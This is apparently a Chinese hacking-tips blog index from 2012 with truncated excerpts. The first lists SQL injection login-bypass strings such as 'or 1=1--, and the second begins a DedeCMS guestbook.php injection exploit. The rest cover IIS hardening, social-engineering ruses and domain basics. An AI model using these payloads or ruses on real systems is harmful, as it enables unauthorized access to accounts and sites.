万能密码汇总

asp aspx万能密码 1："or "a"="a 2： ')or('a'='a 3：or 1=1-- 4：'or 1=1-- 5：a'or' 1=1-- 6："or 1=1-- 7：'or'a'='a 8："or"="a'='a 9：'or''=' 10：'or'='or' 11:   1 or '1'='1'=1 12:   1 or '1'='1' or 1=1 13:   'OR 1=1%00 14:   "or 1=1%…

    522    2012-12-16   去围观

dedecms 最新sql注射漏洞利用guestbook.php

漏洞成功需要条件： 1. php magic_quotes_gpc=off 2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。 怎么判断是否存在漏洞： 先打开www.xxx.com/plus/guestbook.php  可以看到别人的留言， 然后鼠标放在 [回复/编辑]   上 可以看到别人留言…

    1,539    2012-12-12   去围观

删除不必要的IIS组件

最少的服务往往带来最大的安全，一般的Web服务器只需安装的最小组件选择是:Com Files、IIS Snap-In. WWW Server组件。至于Indexing Service,FrontPage 2000 Server Extensions, Internet Service Manager这几个组件非常危险的，没有必要的话完全可以不 安装。在实际…

    432    2012-11-26   去围观

黑客技术之社会工程学

社会工程师的攻击手法也各不相同，以获取无害信息来说，可 以伪装成公司同事然后像其他人索取，或者收集整理公司的垃圾等。不同的攻击方法有不同的实施过程及特点，可能针对上述的某一种人性弱点也可能针对多个弱点，一些常见的社会工程学攻击技巧如下: 1)冒充成不引…

    503    2012-11-08   去围观

域名小知识

域名查询技术 互联网上使用最多的就是域名，域名（Domain Name）是指企业，政府，非政府组织等机构或者个人在域名注册商上注册的名称，是互联网上企业或机构间相互联络的网络地址。通俗地说，域名就相当于一个家庭的门牌号码。别人通过这个号码可以很容易找到你。 …

    632    2012-11-02   去围观